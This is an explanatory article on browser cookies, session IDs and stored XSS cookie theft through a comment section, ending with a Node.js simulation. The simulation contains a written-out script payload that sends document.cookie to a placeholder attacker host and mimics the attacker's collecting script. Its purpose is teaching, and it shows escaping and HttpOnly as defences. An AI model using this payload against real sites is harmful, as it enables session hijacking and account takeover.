A cookie is a small piece of data that a website sends to your browser when you visit, and which your browser then sends back with every later request to that site. Its most important job is to carry the session ID: a long, randomly generated string that lets the site recognise you as the same logged-in user from one request to the next, without asking for your password every time. Cookies are also used extensively to keep track of your preferences. Because they travel between your browser and the server on every request, and because any script running on the page can usually read them, they can be intercepted or stolen quite easily. This article discusses how cookies move around the web and how they can be stolen.
The Cookie Trail
The Cookie Law is a piece of privacy legislation that requires websites to get consent from visitors before storing or retrieving any information on a computer, smartphone or tablet. It was designed to protect online privacy by making consumers aware of how information about them is collected and used online, and by giving them a choice to allow it or not.
Shopping preferences might not count as sensitive information about an individual, but an online shopping cart or a logged-in banking session certainly does, and a site keeps track of all of these with the help of session cookies. If an attacker manages to get hold of your session cookie, they can present it to the site and pose as you: the site has no way to tell the difference, so the attacker gets access to your banking details and your Amazon shopping cart and could order goods on your account to their own address. This generally happens when the site has a vulnerability that lets the attacker carry out cross-site scripting (XSS). It is found mostly in badly coded websites where the developer forgot to apply basic security measures, in particular encoding user-supplied text before putting it into a page, which is what stops an attacker's comment from being treated as script.
How attackers use XSS to steal cookies
I'm going to explain this with a hypothetical scenario. Let's say we visit a vulnerable site that has a comments section. On a secure site, whatever a user types into a comment is treated strictly as text and displayed as text. On an insecure site, the comment is pasted into the page's HTML exactly as typed, so if we post HTML or JavaScript in the comment box, every browser that later loads the page parses it as part of the page and runs it. Note that it is the visitors' browsers, not the server, that execute the injected code, and it runs with the site's own origin, so it can read the site's cookies through document.cookie.
- The attacker posts a comment containing a small script. When any other user loads the comments page, the script runs in that user's browser. All it does is add an image element to the page whose source URL points at the attacker's server, with the user's cookies (read from document.cookie) appended to the URL.
- The user's browser requests that "image" automatically; no click is needed. The URL actually points at a server-side script on the attacker's machine (a PHP file, say) which records the cookie value from the URL and then returns a harmless image, so the user sees nothing unusual in the comment section.
- The cookie, which carries that user's session ID, is now saved in the attacker's database, and the attacker can present it to the site and pose as that user. Two things limit this attack: if the site encodes comments before displaying them, the script never runs; and if the session cookie is marked HttpOnly, document.cookie does not expose it to scripts at all, so even a successful injection does not yield the session ID.
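The chain above, simulated end to end in Node so it runs offline, as an added example that is not code from the original article or from the Computerphile video. It shows the comment payload, the vulnerable renderer beside the escaped one, the URL the victim's browser would request, what the attacker's collecting script does with it, and why HttpOnly stops the theft. The hostname attacker.example, the file name steal.php, and the PHPSESSID value are all constructed placeholders.

```javascript
// Added example (not from the original article). attacker.example, steal.php
// and the cookie values below are hypothetical, constructed for the demo.

// 1. The payload the attacker leaves in the comment box. Parsed as HTML by a
//    visitor's browser, the script runs in the site's origin and requests an
//    "image" whose URL carries document.cookie to the attacker's server.
const EXFIL_ENDPOINT = "https://attacker.example/steal.php"; // hypothetical
const XSS_PAYLOAD =
  `<script>new Image().src="${EXFIL_ENDPOINT}?c="+encodeURIComponent(document.cookie)</script>`;

// 2. The vulnerable renderer: comment text is pasted straight into the markup.
function renderVulnerable(comments) {
  return comments.map((c) => `<li>${c}</li>`).join("\n");
}

// 3. The fix: HTML-escape untrusted text before it goes into markup, so the
//    browser shows the characters instead of parsing them as tags.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (ch) => map[ch]);
}
function renderSafe(comments) {
  return comments.map((c) => `<li>${escapeHtml(c)}</li>`).join("\n");
}

// 4. What the victim's browser sends when the payload runs: the same URL the
//    injected script builds from document.cookie.
function buildExfilUrl(documentCookie) {
  return `${EXFIL_ENDPOINT}?c=${encodeURIComponent(documentCookie)}`;
}

// 5. What the attacker's steal.php does with that request: pull the cookie
//    out of the query string and log it (before returning a harmless image).
function recordStolenCookie(requestUrl, store) {
  const cookie = new URL(requestUrl).searchParams.get("c");
  if (cookie) store.push(cookie);
  return cookie;
}

// 6. What document.cookie exposes for a given set of Set-Cookie headers: the
//    browser hides HttpOnly cookies from script, so they never reach step 4.
function documentCookieFrom(setCookieHeaders) {
  return setCookieHeaders
    .filter((h) => !/;\s*httponly\b/i.test(h))
    .map((h) => h.split(";")[0].trim())
    .join("; ");
}

// Run the whole chain against a weak site and a hardened one.
function demo() {
  const comments = ["Nice article!", XSS_PAYLOAD];
  const vulnerableHtml = renderVulnerable(comments); // contains a live <script>
  const safeHtml = renderSafe(comments);             // contains &lt;script&gt;

  // Session cookie set without HttpOnly: the script can read it (constructed values).
  const weakHeaders = ["PHPSESSID=3f9a1c; Path=/", "theme=dark; Path=/"];
  const stolen = [];
  recordStolenCookie(buildExfilUrl(documentCookieFrom(weakHeaders)), stolen);

  // Same site with HttpOnly on the session cookie: only the theme leaks.
  const hardenedHeaders = ["PHPSESSID=3f9a1c; Path=/; HttpOnly; Secure", "theme=dark; Path=/"];
  const stolenHardened = [];
  recordStolenCookie(buildExfilUrl(documentCookieFrom(hardenedHeaders)), stolenHardened);

  return { vulnerableHtml, safeHtml, stolen, stolenHardened };
}

const result = demo();
console.log("vulnerable page contains <script>:", result.vulnerableHtml.includes("<script>"));
console.log("escaped page contains <script>:", result.safeHtml.includes("<script>"));
console.log("stolen from weak site:", result.stolen);
console.log("stolen from HttpOnly site:", result.stolenHardened);
```

Escaping is the real fix, since it stops the script from ever running; HttpOnly is defence in depth that keeps the session ID out of reach if an injection slips through. Neither replaces the other.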
References: Computerphile (YouTube channel)